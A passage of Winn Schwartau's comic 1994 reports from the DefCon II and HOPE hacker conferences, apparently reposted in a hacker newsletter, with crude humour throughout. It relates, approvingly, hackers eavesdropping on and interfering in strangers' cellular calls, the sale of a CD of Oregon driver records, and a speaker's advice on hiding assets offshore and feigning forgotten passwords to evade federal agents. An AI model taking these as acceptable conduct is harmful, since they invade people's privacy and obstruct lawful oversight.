did?" "The guy on the radio." (Technical ignorance abounds.) Hacker: "Me. You're late and she's scared so we're gonna beat you there and make her safe." "Who the hell is that?" "Who?" "The guy with you?" "There's no one here." "He says he's gonna beat me there and pick you up." Hacker: "Damn right we are." "Hey, this is cool. Who's there?" Hacker: "Cyber Christ talking to you from Silicon Heaven." "No shit. Really?" Hacker: "Yeah, (choke, choke,) really." "What's happening, honey." "I don't know, for sure. He says it's God." "God!?!?" Hacker: "Close enough. Listen, you sound alright. Go get your woman, man Keep her safe." "No problem. Uh, thanks." Click. Around 4AM, I guess it was, the hacker/phreaks definitely helped out law enforcement. One end of the conversation was coming from inside a hotel, maybe even the Sahara. The other from another cell phone, most likely in the lobby. "What do you look like?" "I'm five foot nine, thinning brown hair and 180 pounds I wear round glasses and . ." "I get the idea. Where are you now?" "I'm coming down the elevator now. What do you look like?" "I'm six foot one in my heels, have long blond spiked hair and black fishnet stockings." Hacker: "Don't go man. It's a bust." "What?" he said. Hacker: "Don't go, it's a bust. You don't want your name in the papers, do ya?" "What the fuck?" she yelled. "There's a guy who says this is a bust?" "Bust? What bust?" Hacker: "That's the clue, man. She's denying it. Of course it's a bust. Is it worth a night in jail to not get laid?" "Shit." He whispers not too quietly to another male companion. "There's some guy on the phone who says it's bust. What should we do." Hacker: "I'm telling you man, don't go," "This ain't worth it. I'm going back upstairs." Click. A couple of hours later the same hooker was overheard talking to one of her work mates. "Then this asshole says it's a bust. Cost me $300 in lost business, shit." "You, too? Same shit been going on all night long. What the fuck?" Wow. And it seems like only this morning that my toilet exploded. * * * * * So what's a perfectly groomed and slightly rotund 50-something convicted methamphetamine dealer doing at DefCon II with hundreds of impressionable teenagers? You might well ask. So I'll tell you. Sitting in yet another Saharan hell-hole of a room they unabashedly market for $55 per night I encountered hackers #1 through #4 and this . . . I immediately thought, elderly gent. He said nothing and neither did I, thinking that he might have been an over aged chaperone for delinquent teens or perhaps even an understanding Fed. But the gallon jugs of whiskey was depleting itself right before my eyes, as if a straw from Heaven sucked the manna from its innards. Actually, it was Bootleg. Not bootleg liquor, mind you, but Bootleg the felonious con from Oregon. Apparently he got busted 'cause speed is and was against the law, and crank is not exactly the drug choice of maiden aunts nor school marms. "I've been a hacker longer than some of these kids have been alive. It all started back in . . ." and Mike "Bootleg" Beketic commenced on the first of hundreds of war- story jail house tales to entertain him and us. Bootleg loves a good story. "Jail ain't so bad," he bragged with a huge whiskey smile. "No one fucked with me. You gotta make friends early on. Then it's OK." Good advice, I guess. "On parole I got slammed with a year for piss that didn't pass." Gotta be clean, my man. Stay away from that shit. It'll kill you and your teeth will rot. Bootleg handed me form PROB-37, (Rev. 1/94) from the United States District Court, Federal Probation System. Grins from ear to ear. A badge of honor for villains, thieves, and scoundrels. Sounds like they need their own union. This was the official "Permission To Travel" form dated June 16, 1994 which gave Bootleg the legal right to travel from Oregon to Las Vegas in the dead of the summer to attend a "computer convention." The flight times were specific as were the conditions of his freedom. He had to inform the local cops that he was in town. In case any crimes occurred throughout the city of Las Vegas during his sojourn, he was an easily identifiable suspect. While he downed another Jack and coke I found out what Bootleg was really doing. Despite the fact that the "Federal Keep Track of a Crook Travel Form" said, "you are prohibited from advertising or selling your DMV CD," the paranoia ran rampant through the minds of prison bureaucracy was actually in this case quite correctly concerned. "What's a DMV CD?" "I'm glad you asked." I was set up. The edict said he couldn't sell or advertise, but there was no provision stating that he couldn't answer questions from an inquiring mind. Bootleg handed me a CD ROM: Bootleg Presents: DMV - Over 2 Million Oregon Drivers License Records - Over 3 Million Oregon License Plate Records The inside jacket clearly stated that this information was not to be used by any creatively nefarious types for any sort of personal Information Warfare tactics. It warns, Do not use this CD to: - Make phony Licenses - Make phony Titles - Obtain phony I.D. - Harass Politicians, Cops or Journalists - Stalk Celebrities - Get ME in trouble <G> I can come up with at least 1001 other uses for this collection of information that the Oregon authorities are none too happy about. The ones Bootleg outlined never came into my mind. (Heh!) Bootleg acquired the information legally. State officials were kind enough to violate the electronic souls of its citizens by sending Bootleg their driver's information magnetically emblazoned on a 3600 foot long piece of 9 track acetate. Now they want to change the law to reflect "heart felt concern for the privacy of their citizens." Get a clue, or if none's available, buy one from Vanna. Bootleg is moving onto the next 47 states (California and New York don't permit this kind of shenanigans) shortly to make sure that everyone has equal access. Hacking? Of course. Bootleg effectively hacked the Oregon DMV with their blessing and tax payer paid-for assistance. Time to go back to my room while Bootleg and friends spent an evening of apparently unsuccessful whoring around the Strip and Glitter Gulch. A good time was had by all. * * * * * Jeff Moss opened the Sunday morning session with an ominous sermon. "You'll notice that the wet bar is missing from the rear?" It had been their yetserday. Everyone turns around to look. "I gotta pay for the damage . . . " Jeff was not a happy camper. "They have my credit card number and it's almost full. So cool it!" But the show must go on and we had more to learn. Next. Anonymous mailers on the net? Forget about it. No such thing. Anonymous remailers, even if they are in Norway or Finland or some such other country where American information contraband such as child pornography is legal, are only as safe and secure as the people who run it "The FBI can go over any time they want and look up who you are and what kinds of stuff you swallow down your digital throat," one speaker announced. Of course that's ridiculous. The FBI would have to call in the Boy Scouts or Russian Mafia for that kind of operation, but we all knew that anyway. A slight slip of the ad lib tongue. No harm done. I didn't know, until this Sunday, that there were actually real live versions of "Turn Up The Volume" running rampant across the country, impinging their commercial-free low power radio broadcasts into an electromagnetic spectrum owned and operated by the Federal Communications Commission. And, as to be expected, the FCC is trying to put this relatively harmless stations out of business along with Howard Stern and Don Imus. One would think that WABC or KLAC or any other major market stations would little care if a podunk 20 watt radio station was squeezing in between assigned frequencies. And they probably shouldn't. But, as we learned, the Military lent an innocent hand. In support of the hobbies of servicemen, a local San Francisco base commander gave approval for a group of soldiers to establish a small, low power radio station for the base. Good for morale, keep the men out of the bars: you know the bit. But the ballistic missiles went off when the nation's premier rating service, Arbitron, listed KFREE as a top local station in the San Francisco market. "What station KFREE?" "Who the hell are they?" "What the fuck?" Needless to say, KFREE was costing the legitimate radio stations money because advertising rates are based upon the number of listeners not up and peeing during commercials. Since KFREE was ad-free, no contest. Arbitron assumes the rating to relect the existence of a real station - the numbers are there - and the local stations call the FCC and the FCC calls the base and as quick as you can scream, "Feds suck!" KFREE is off the air. Stomp. I was scheduled to speak today, but with the schedule seemingly slipping forward and backward at random haphazard intervals, there was no telling when what would occur. Mark Ludwig, of Virus Writing Contest fame and author of the much touted "Little Black Book of Computer Viruses" Virus gave a less then impassioned speech about the evils of government. "I know most of you don't have any assets other than your computer," Ludwig said to the poverty stricken masses of DefCon II. "But you will, and you want to make sure the government doesn't come crashing down around you whenever they want. They can and will take your life away if it suits them. There is no fourth amendment. Most search and seizures are illegal." And so it went. "Put your money off shore, kids," said Dr. Ludwig the theoretical physicist. "Find a good friendly country will flexible banking laws and the Feds can't get you." "And when the Fed do come for you, make sure that your entire life is on your computer. Rip up the papers after you scan them in. Your all-electronic life cannot be penetrated - especially if you get a case of the forgets. 'Oops, I forgot my password. Oops! I forgot my encryption key. Oops! I forgot my name.'" "Even your VISA and Mastercard accounts should be from overseas. Keep it out of the US and you'll be all the better for it." For those interested in such alternative, Ludwig recommends that you call Mark Nestman: of LPP Ltd. at 800-528-0559 or 702-885-2509. Tell him you want to move your millions of rubbles and dollars and Cyber-credits overseas for safe keeping because the Byzantine Police are at the front door as you speak. Order pamphlet 103. These are the defensive measures we can take protect ourselves against the emerging Police State. But offensive action is also called for, he says. "Help Phil Zimmerman. Send him money for his defense. Then, laugh at the Feds!" Ha ha ha ha. Haha. Hahahahahaha. Ha! ."When they come to the door, just laugh at them." Haha. Hahaha. Haha. "No matter what they do, laugh at them." Hahahahaha. Enough of that, please. If I laugh at 6 husky beer-bellied Cyber-cops who have an arsenal of handguns pointed at my head, they might as well send me to the Group W bench to commiserate with Arlo Guthrie. Peeing would come before laughing. But then again, I'm no longer a grunged out 20 year old who can laugh in the face of the Grim Reaper. "Yes, ossifer, sir. I'm a cyber- crook. I ain't laughing at you in your face, ossifer, sir . . ." I panic easily. Kissing ass well comes from a life long success of quid pro quo'ing my way from situation to situation. "And, now," Master Mark announced, "on to the results and awards for the Annual Virus Writing contest." Ludwig seemed suddenly depressed. "Unfortunately, we only got one legitimate entry." One entry? The media plastered his contest across the media- waves and the National Computer Security Association was planning a tactical nuclear response. One entry? What kind of subversives have 20 year olds turned into anyway? In my day (Yeah, I'm old enough to use that phrase) if we called for a political demonstration thousands would pile through the subway turnstiles to meet a phalanx of well armed police appropriately attired in riot gear. One entry? Come on X-Generation, you can do better than that? No wonder the world's going to shit. Don't have enough trouble from the young-uns. Sheeeeeeesssh! Mark Ludwig's politically incorrect virus writing contest may have been a PR success but it was a business abortion. One entry. Shit. At the NCSA meeting in Washington, rivaling factions battled over how we as an association should respond. "Hang the bastard." "He's what's wrong with world." "Put him in a county jail with Billy-Bob, Jimmy-Ray and Bubba for a week and they'll be able to squeeze him out between the bars." C'mon you fools! Ignore him! Ignore him! If you don't like what he has to say don't egg him on. Ignore him. You want to do what the Feds did to poor Phil Zimmerman and make him a folk hero? Turn a non-event into the lead for the evening news is not the way to make something go away. I loudly advocated that he be treated as a non-entity if the goal was reduction to obscurity. I was right. Super-high priced PR and lobby firms had prepared presentation to wage an all-out attack on Ludwig and his contest. I bet! And who was going to pay for this? Peter Tippitt of Semantech ponied up what I believe amounted to $7,000 to get the pot going. No one else made a firm offer. Can't blame them cause it would have been no more effective than taking out an ad in USA proclaiming that evil is bad. The PR firm would have made their fees, the event would have made even more news and Ludwig would certainly have had to make a judgement and choose from more than one entry. But oddly enough, the one entry did not win. The winner of the Annual Virus Writing Contest was no less than Bob Bales, Executive Director of the NCSA. Not that Bob wrote a program, but is he had, it would be called either Don Quixote or Paranoia, and it would be of the human brain attacking Meme type. The virus is a software equivalent of Prozac to alleviate the suffering in middle-aged males who have no purpose in life other than virus busting. "Is Winn Schwartau here?" Mark asked the audience. I was there. "Yo!" "Would you tell Bob that he's won a plaque, and a $100 check and a full year subscription to the Computer Virus Developments Quarterly." I'm the technology advisor to the NCSA so it was natural request. I told Bob about his 15 minutes of fame at DefCon to which he roared in laughter. "Good! Then I won't have to subscribe myself." I spoke next. Jeff introduced me by saying, "Winn says he doesn't want to speak to an empty room so he's gonna talk now." Some introduction. But, what a great audience! Better than most of the security above-ground starched sphincter tight suit and tie conference audiences I normally get. But then again, I get paid handsomely to address legitimate audiences where I have to be politically correct. At DefCon, insulting people was the last thing I worried about. It was what I focused on, onstage and off. "Hey, kid. Did you ever land Zimmerman in bed?" "You, you, er . . ." "C'mon kid. Give me your best shot." "Your mother . . ." A crowd gathered to see what kind of repartee this little schnook could come up with. "Your mother .. ." C'mon kid. You got it in you. C'mon. "You, she is a . . . uh, . . . mother . . ." and he finally skulked away in sheer embarrassment. Poor kid. When he went to the men's room, men walked out. Poor kid. I don't think he ever figured out it was all a put on. The audience got it, though. Rather than go over what I rambled about for an hour, here comes a blatant plug: Go buy my new book "Information Warfare: Chaos on the Electronic Superhighway." That'll sum it up real nice and neat. But what a great audience. Thanks. Little did I know, though, that I was also on trial. John Markoff of the New York Times was the first to ask, and then a couple of buddies asked and then a lady asked during the Q&A portion of my ad hoc ad lib speech. "How come you did it?" Did what? "How come you flamed Lenny DeCicco?" It turns out that someone adapted my electronic identity and logged on to the WELL in Sausalito, CA and proceeded to post a deep flame against Lenny. Among other none-too-subtle aspersions, 'my' posting accused Lenny of a whole string of crimes of Information Warfare and even out and out theft. Except, it wasn't me. I answered the lady's question with, "It wasn't me, I don't know Lenny and I don't have an account on the WELL." That satisfied everyone except for me. What happened and why? It seems that Lenny's former partner in crime Most- Wanted on the lam federal fugitive computer hacker Kevin Mitnick actually wrote and signed the letter with his initials. Or someone was spoofing him and me at the same time. But why? And why me? It took a couple of days after arriving home from DefCon to learn after extensive conversations with the WELL that my erased account from almost two years ago and then re-erased on June 20 of this year was accidentally turned back on by some mysterious administrative process that I cannot claim to fathom. OK, that's what they said. But perhaps most interesting of the entire Getting Spoofed incident was a single comment that Pei Chen, sysop of the WELL said to me while I complained about how such an awful anti-social attack was clearly reprehensible. Oh, it's simple, she said. "We have no security." Whooaaaahhh! The WELL? No security? I love it. I absolutely love it. Major service provider, no security. Go get 'em cowboy. The only other speaker I wanted to see was Peter Beruk, chief litigator for the Software Publisher's Association. This is the Big Software Company sponsored organization which attempts to privately interdict illegal software distribution as a prelude for both civil and criminal prosecutions. And with this group of digital anarchists, no less. The SPA scrounges around 1600 private BBS's to see who's making illicit copies of Microsoft Word or Quattro For Weanies or Bulgarian for Bimbos or other legitimate software that the publishers would rather receive their due income from then being stolen. "Which boards are you on?" "That would be telling." Big grin and laughs. "Is your BBS secure?" A challenge in the making. "Sure is." "Is that an offer to see if we can break in?" Challenge made. "Ahem, cough, cough." Challenge denied. "What name do you use on the boards?" Idiot question that deserves an idiot answer. "Fred." Laughs. "You mean you have a full time guy to download software from boards to see if it's legal or not?" "Yup." "So, you pay people to commit felonies?" Astutely stupid question. "We have permission." "Why should we have to pay rip-off corporations too much money to use really shitty software?" "So don't buy it." "We don't. It's so shitty that it's barely worth stealing." "So don't steal it." "Just want to check it out, dude." "Scum sucking imperialists are making all of the money. The software designers are getting ripped off by the big software bureaucracies. Power to the people." Every generation goes through this naively innocent berating of capitalism. It doesn't make them Communists (in 1950 it did), just not full fledged capitalist pigs themselves yet. Soon come. Vis a vis Ludwig's comment on the asset-deprived audience. Soon come, man. "We go after BBS's that store illegal software." "So you're gonna put Compuserve in jail?" Big, big applause. Despite the openly verbal animosity between the free-ware believers and the Chief Software Cop, the spirited and entertaining disagreements maintained a healthy good natured tone that well exceed Peter's time limit, as DefCon II was coming to a close. It was time for one more stand up comedy attempt by a long haired bandanna wearing hippie/hacker/phreak who was not quite up to the job. "OK, guys. We've had some fun at the Feds expense. They're people, too. So, from now on, it's Hug a Fed. Go on, find a fed and go up to him or her and big them a great big bear hug full of love." The Feds that had been busted were gone. The ones still successfully undercover weren't about to blow it for quick feel from a horny teenager. Next. The Cliff Stoll doll with an assortment of accessory yo- yos was a popular item. It was thrown pell-mell into the crowds who leapt at it with a vengeance like a baseball bleachers section awaiting the 61st home run. "There used to be a Wife of Cliff Stoll doll, but no one's seen it in two years." Cliff is strange. I don't know if he's that strange, but it was a funny bit. "Then we have the LoD/MoD action figure set starring Erik Bloodaxe and Phiber Optik." GI Joe action set gone underground. Corny, but appreciated as hundreds of bodies dove to catch the plastic relics tossed from the stage. If anything, an anti-climatic end to an otherwise highly informative and educational conference. I can hardly wait till next year when, after word gets out, DefCon III will be attended by thousands of hackers and cops and narks who will try to replay the Summer of Cyber-Love '94 for a sequel. * * * * * More than anything I wanted to get away from the Sahara. Away from its nauseatingly chromatic carpets, it's hundreds of surveillance cameras, and most of all, away from its exploding toilets. We decided to play, and play we did at the new Luxor Hotel which is an amazing pyramid with 4000+ rooms. There are no elevators as in a pyramid 'going up' is kind of useless, so Inclinators take passengers up the 30 some odd floors to hallways which ring around the impossibly huge hollowed out pyramid shaped atrium. This was play land. And for three hours we played and played and went to dumb shows that attract mid-western mamas from Benign, Ohio, alighting in Vegas for their annual RV pilgrimage. But we went and enjoyed none the less. The "Live TV" show was anything but live except for lovely Susan who hosted us into the ersatz TV station. Her job is to look pretty, sound pretty and warm up the crowd for an over budget, overproduced schmaltz driven video projection that was to make us all feel like we were on stage with Dave. Letterman, that is. The effect does not work. But we enjoyed ourselves, anyway. "Everyone here on vacation?" "No!" I yelled out. Poor Susan was stunned. No? Why else would you be here? "What are you doing?" The TV audience of 500 was looking our way. Between the five of us we had a million dollars (give or take) of electronic wizardry stuffed around us, beneath us and in our laps. "Working." Gee, I'm quick. "What do you do?" Susan asked with a straight face. I bet she expected something like gas pumper, or nocturnal mortuary fornicator or 7/11 clerk. "We're hacking for Jesus. This is Cyber Christ!" I said pointing at Erik Bloodaxe. Silence. Dead silence again. Sleep with Phil Zimmerman silence. Except for us. We giggled like school boys. Psyche. "Ah, . . . that's nice." That was all she could come up with: That's nice. So much for ad libbing or deviating from the script. But the TV audience enjoyed it. A whole lot. They finally figured out it was put on. Not every one from the Mid- West is as stupid as they all pretend to be. Then it was time to get sick. VR rides do me in, but not to be publicly humiliated by my 20- something cohorts (and Mike Peros with whom I had to travel yet another 2000 miles that night) I jumped right into an F-14 simulator which rotated 360 degrees on two gimbals for an infinite variety of nauseousness. "Oh, shit!" I yelled as I propelled myself forward and around and sideways with sufficient g-force to disgorge even the most delectable meal. "Oh, shit." I had reversed the throttle and was now spinning end over end backwards. My inner ear was getting my stomach sick. "Oh, shit." Out of the corner of my eyes my four pals were doubled over in laughter. Had I barfed yet and not known it? God, I hope not. "Oh, shit." I came to a dead standstill, the video screen showed me plummeting to earth at escape velocity and I pushed the throttle forward as roughly as I could. An innate survival instinct came in to play. "Oh, shit!" The virtual aircraft carrier came into sight and after almost 2 minutes of high speed rotating revulsion, I was expected to land this spinning F-14 on a thimble in the ocean. Right. I tried, and damned if I didn't make it. I have no idea how, but I got an extra 34,000 points for a safe landing. 120 seconds. Ding. Time's up. I got out of the simulator and spilled right onto the floor; one 42 year old pile of humanity who had navigated nausea but whose balance was totally beyond repair. "Could anyone hear me?" I asked from my knees. "They were selling tickets." "Do I get my money back?" Onto the VR race cars. I really thought I'd throw up to the amusement of a thousand onlookers. Hacking then phreaking then flying and now driving. I put the pedal to the metal and crashed. The huge video display has me tipping end over end and the screen is shaking and the car I'm driving is shuddering violently but my brain can't compute it all. I'm gonna wretch, I just know it. But I keep on driving, decidedly last against people who haven't been handicapped with an inner ear so sensitive I get dizzy when I watch a 5" black and white TV. We tilted out of there and alas, it was time to find a 200,000 pound of metal to glide me home. It was damn good thing I hadn't eaten before VR Land, but I wolfed down $3 hot dogs at the airport knowing full well that whatever they served on the plane would be a thousand times worse. So Mike and I munched, leaving Cyber Christ and friends to battle the press and the stars at the opening of Planet Hollywood at Caesar's Palace. And then an unexpected surprise. Lisa and friend; our first class objects of flirtation from the outbound trip which seemed like a month ago, appeared. But we were all so wiped out that a continent of innuendo turned into a series of short cat naps. We got a few flirts in, but nothing to write home about. Red Eye flights are just not what they're cracked up to be. As I crawled into bed at something like 7AM Eastern, my wife awoke enough to ask the perennial wife question. "What did you do all weekend?" I, in turn, gave her the usual husbandly response. "Oh, nothing. Good night, Gracie." * * * * * (C) 1994 Winn Schwartau Winn Schwartau is an information security consultant, lecturer and, obviously, a writer. Please go buy his new book: "Information Warfare: Chaos on the Electronic Superhighway." Available at book stores everywhere. Winn can be reached at: Voice: 813.393.6600 or E-mail: P00506@Psilink.com Notice: This article is free, and the author encourages responsible widespread electronic distribution of the document in full, not piecemeal. No fees may be charged for its use. For hard copy print rights, please contact the author and I'll make you an offer you can't refuse. @HWA 41.0 Cyber-Christ takes a byte out of the big apple, Winn Schwartau at HOPE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cyber Christ Bites The Big Apple HOPE - Hackers On Planet Earth, New York City - August 13-14, 1994 (C) 1994 Winn Schwartau by Winn Schwartau (This is Part II of the ongoing Cyber Christ series. Part I, "Cyber Christ Meets Lady Luck" DefCon II, Las Vegas, July 22-24, 1994 is available all over the 'Net.) Las Vegas is a miserable place, and with a nasty cold no less; it took me three weeks of inhaling salt water and sand at the beach to finally dry up the post nasal drip after my jaunt to DefCon II. My ears returned to normal so that I no longer had to answer every question with an old Jewish man's "Eh?" while fondling my lobes for better reception. New York had to be better. Emmanuel Goldstein -aka Eric Corely - or is it the other way around? is the host of HOPE, Hackers on Planet Earth, a celebration of his successfully publishing 2600 - The Hackers Quarterly for ten years without getting jailed, shot or worse. For as Congressman Ed Markey said to Eric/Emmanuel in a Congressional hearing last year, and I paraphrase, 2600 is no more than a handbook for hacking (comparable obviously to a terrorist handbook for blowing up the World Trade Center) for which Eric/Emmanuel should be properly vilified, countenanced and then drawn and quartered on Letterman's Stupid Pet Tricks. Ed and Eric/Emmanuel obviously have little room for negotiation and I frankly enjoyed watching their Congressional movie where communication was at a virtual standstill: and neither side understood the viewpoints or positions of the other. But Ed is from Baaahhhsten, and Eric/Emmanuel is from New York, and HOPE will take place in the Hotel Filthadelphia, straight across the street from Pennsylvania Station in beautiful downtown fast-food-before-they-mug-you 34th street, right around the corner from clean-the- streets-its-Thanksgiving Herald Square. Geography notwithstanding, HOPE promised to be a more iconoclastic gathering than that of DefCon II. First off, to set the record straight, I am a New Yorker. No matter that I escaped in 1981 for the sunny beaches of California for 7 years, and then moved to the Great State of the Legally Stupid for four more (Tennessee); no matter that I now live on the Gulf Coast of Florida where the water temperature never dips below a chilly 98 degrees; I am and always will be a New Yorker. It took me the better part of a decade of living away from New York to come to that undeniable and inescapable conclusion: Once a New Yorker, always a New Yorker. Not that that makes my wife any the happier. "You are so rude. You love to argue. Confrontation is your middle name." Yeah, so what's your point? You see, for a true New Yorker these aren't insults to be re- regurgitated at the mental moron who attempts to combat us in a battle of wits yet enters the ring unarmed; these are mere tru- isms as seen by someone who views the world in black and white, not black, white and New York. Case in point. I used to commute into Manhattan from the Westchester County suburb of Ossining where I lived 47 feet from the walls of Sing Sing prison (no shit!). Overlooking the wide expanse of the Hudson River from my aerie several hundred feet above, the only disquieting aspect of that location were the enormously deafening thunderclaps which resounded a hundred and one times between the cliffs on either side of the river. Then there was the occasional escapee- alarm from the prison. . So, it was my daily New York regimen to take the 8:15 into the city. If the train's on time I'll get to work by nine . . . Grand Central Station - the grand old landmark thankfully saved by the late Jackie O. - is the nexus for a few hundred million commuters who congregate in New York Shitty for no other reason that to collect a paycheck to afford blood pressure medicine. You have to understand that New York is different. Imagine, picture in your mind: nothing is so endearing as to watch thousands of briefcase carrying suits scrambling like ants in a Gary Larson cartoon for the nearest taxi, all the while greeting their neighbors with the prototypical New York G'day! With both fists high in the air, middle fingers locked into erect prominence, a cacophonous chorus of "Good Fucking Morning" brightens the day of a true New Yorker. His bloodshot eyes instantly clear, the blood pressure sinks by 50% and already the first conflict of the day has been waged and won. Welcome to the Big Apple, and remember never, ever, to say, "Have a Nice Day." Oh, no. Never. So HOPE was bound to be radically different from Vegas's DefCon II, if only for the setting. But, I expected hard core. The European contingent will be there, as will Israel and South America and even the Far East. All told, I am told, 1000 or more are expected. And again, as at DefCon II, I am to speak, but Eric/Emmanuel never told me about what, when, or any of the other niceties that go along with this thing we call a schedule. * * * * * God, I hate rushing. Leaving Vienna at 3:15 for a 4PM Amtrak "put your life in their hands" three hour trip to New York is not for the faint of heart. My rented Hyundai four cylinder limousine wound up like a sewing machine to 9,600 RPM and hydroplaned the bone dry route 66 into the pot holed, traffic hell of Friday afternoon Washington, DC. Twelve minutes to spare. I made the 23 mile trip is something less than three minutes and bounded into the Budget rental return, decelerated to impulse power and let my brick and lead filled suitcase drop to the pavement with a dent and a thud. "Send me the bill," I hollered at the attendant. Never mind that Budget doesn't offer express service like real car rental companies. "Just send me the bill!" and I was off. Eight minute to spare. Schlepp, schlepp. Heavy, heavy. Holy shit! Look at the line for tickets and I had reservations. "Is this the line for the four o'clock to New York?" Pant, breathless. "Yeah." She never looked up. "Will they hold the train?" "No." A resoundingly rude no at that. Panic gene takes over. "What about the self-ticketing computer?" I said pointing at the self ticketing computer. "Do you have a reservation?" "Yup." Maybe there is a God. "Won't help you." "What?" Nothing. "What do you mean won't help?" "Computer's broken." Criminy! I have 4 minutes and here's this over-paid over-attituded Amtrak employee who thinks she's the echo of Whoopi Goldberg. "The line's over there." Have you ever begged? I mean really begged? Well I have. "Are you waiting for the four?" "Can I slip ahead?" "Are you in a death defying hurry?" "I'll give you a dime for your spot in line." "You are so pretty for 76, ma'am. Can I sneak ahead?" Tears work. Two excruciating minutes to go. I bounced ahead of everyone in a line the length of the Great Wall of China, got my tickets and tore ass through Union Station The closing gate missed me but caught the suitcase costing me yet more time as I attempted to disgorge my now-shattered valise from the fork-lift- like spikes which protect the trains from late-coming commuters. The rubber edged doors on the train itself were kinder and gentler, but at this point, screw it. It was Evian and Fritos for the next three hours. * * * * * Promises tend to be lies. The check is in the mail; Dan Quayle will learn to spell; I won't raise taxes. I wonder about HOPE. "It's going to be Bust Central," said one prominent hacker who threatened me with electronic assassination if I used his name. "Emmanuel will kill me." Apparently the authorities-who-be are going to be there in force. "They want to see if Corrupt or any of the MoD crew stay after dark, then Zap! Back to jail. (giggle, giggle.) I want to see that." Will Mitnick show up? I'd like to talk to that boy. A thousand hackers in one place and Eric/Emmanuel egging on the Feds to do something stupid. Agent Steal will be there, or registered at least, and half of the folks I know going are using aliases. "I'd like a room please." "Yessir. Name?" "Monkey Meat." "Is that your first or last name?" "First." "Last name?" "Dilithium Crystal." "Could you spell that?" Now: I know the Hotel Pennsylvania. It used to be the high class Statler Hilton until Mr. Hilton himself decided that the place was beyond hope. "Sell it or scuttle it." They sold and thus begat the hotel Filthadelphia. I stayed here once in 1989 and it was a cesspool then. I wondered why the Farsi-fluent bellhop wouldn't tell me how bad the damage was from the fire bombed 12th floor. The carpets were the same dingy, once upon a time colorful, drab as I remembered. And, I always have a bit of trouble with a hotel who puts a security check by the elevator bank. Gives you the warm and fuzzies that make you want to come back right away. I saved $2 because none of the bell hops noticed I needed help, but then again, it wouldn't have mattered for there was no way he and I and my luggage were going to fit inside of what the hotel euphemistically refers to as a 'room'. Closet would be kind but still inaccurate. I think the word, ah, '$95 a night slum' might still be overly generous. Let's try . . . ah ha! the room that almost survived the fire bombing. Yeah, that's the ticket. The walls were pealing. Long strips of yellowed antique wallpaper embellished the flatness of the walls as they curled towards the floor and windows. The chunks of dried glue decorated the pastel gray with texture and the water stains from I know not where slithered their way to the soggy carpet in fractal patterned rivulets. I stood in awe at early funk motif that the Hotel Filthadelphia chose in honor of my attendance at HOPE. But, no matter how bad my room was, at least it was bachelor clean. (Ask your significant other what that means. . .) In one hacker's room no bigger than mine I counted 13 sleeping bags lying amongst the growing mold at the intersection of the drenched wallboard and putrefying carpet shreds. (God, I love going to hacker conferences! It's not that I like Hyatt's and Hilton' all that much: I do prefer the smaller facilities, but, I am sad to admit, clean counts at my age.). My nose did not have to venture towards the floor to be aware that the Hotel Filthadelphia was engaging in top secret exobiological government experiments bent on determining their communicability and infection factor. The top floor of the Hotel Filthadelphia - the 18th - was the place for HOPE, except the elevator door wouldn't open. The inner door did, but even with the combined strength of my personal crowbar (a New York defensive measure only; I never use it at home) and three roughians with a bad case of Mexican Claustrophobia, we never got the door open. The guard in the lobby was a big help. "Try again." Damned if he didn't know his elevators and I emerged into the pre-HOPE chaos of preparing for a conference. About 100 hackers lounged around in varying forms of disarray - Hey Rop! Rop Gongrijjp editor of the Dutch Hacktic is a both a friend and an occasional source of stimulating argument. Smart as a whip, I don't always agree with him, though, the above- ground security types ought to talk to him for a clear, concise and coherent description of the whys and wherefores of hacking. Hey Emmanuel! Hey Strat! Hey Garbage Heap! Hey Erikb! Hey to lots of folks. Is that you Supernigger? And Julio? I was surprised. I knew a lot more of these guys that I thought I did. Some indicted, some unindicted, some mere sympathizers and other techno-freaks who enjoy a weekend with other techno-freaks. Security dudes - get hip! Contact your local hacker and make friends. You'll be glad you did. From behind - got me. My adrenaline went into super-saturated mode as I was grabbed. I turned and it was . . . Ben. Ben is a hugger. "I just wanted to hug you," he said sweetly but without the humorous sexually deviant connotation that occurred during Novocain's offer to let Phil Zimmerman sleep with him in Las Vegas. I smiled a crooked smile. "Yeah, right." Woodstock '94 was a mere 120 miles away . . .maybe there was a psychic connection. But Ben was being sincere. He was hugging everyone. Everyone. At 17, he really believes that hugging and hacking are next to Godliness. Boy does he have surprise coming the first time his mortgage is late. Keep hugging while you have the chance, Ben. Assorted cases of Zima (the disgusting Polish is-this-really-lime flavored beer of choice by those without taste buds) appeared, but anyone over the age of 21 drank Bud. What about the 12 year olds drinking? And the 18 year olds? And the 16 year olds? "Rop, I don't think you need to give the hotel an excuse to bust you guys outta here." Me, fatherly and responsible? Stranger things have happened. The beer was gone. I'm not a teetotaler, but I didn't want my weekend going up in flames because of some trashed 16 year old puking on an Irani ambassador in the lobby. No reason to test fate. * * * * * Nothing worked, but that's normal. Rop had set up HEU (Hacking at the End of the Universe) in Holland last year with a single length of 800m ethernet. (That's meter for the Americans: about 2625 ft.) HOPE, though was different. The Hotel Filthadelphia's switchboard and phone systems crashed every half hour or so which doesn't do a lot for the health of 28.8 slip lines. The object of the exercise was seemingly simple: plug together about 20 terminals into a terminal server connected to Hope.Com and let 'em go at it. Provide 'net access and, to the lucky winner of the crack-the-hopenet server (root) the keys to a 1994 Corvette! You heard it right! For breaking into root of their allegedly secure server, the folks at 2600 are giving away keys to a 1994 Corvette. They don't know where the car is, just the keys. But they will give you the car's last known location . . . or was it $50 in cash? Erikb - Chris Goggans - showed up late Friday night in disguise: a baseball cap over his nearly waist length dirty blond hair. "He's here!" one could hear being muttered. "He had the balls to show up!" "He's gonna get his ass kicked to a pulp." "So you did come . . . I was afraid they'd intimidated you to stay in Texas." No way! "Why tell the enemy what your plans are." Even the 50's- something ex- amphetamine-dealer turned reseller of public-records Bootleg didn't know Goggans was going to be there. But the multiple fans of Erikb, (a strong resemblance to Cyber Christ if he do say so himself) were a-mighty proud to see him. This stunning Asian girl with skin too soft to touch (maybe she was 14, maybe she was 25) looked at Erikb by the message board. "You're," she pointed in disbelief "Erikb?" Chris nods, getting arrogantly used to the respectful adulation. Yeah, that's me, to which the lady/girl/woman instantly replied, "You're such an asshole." Smile, wide smile, hug, kiss, big kiss. Erikb revels in the attention and hundreds of horny hackers jealously look on. Friday night was more of an experience - a Baba Ram Dass-like Be Here Now experience - with mellow being the operative word. The hotel had apparently sacrificed 20,000 square feet of its penthouse to hackers, but it was obvious to see they really didn't give a damn if the whole floor got trashed. Ceiling panels dripped from their 12 foot lofts making a scorched Shuttle underbelly look pristine. What a cesspool! I swear 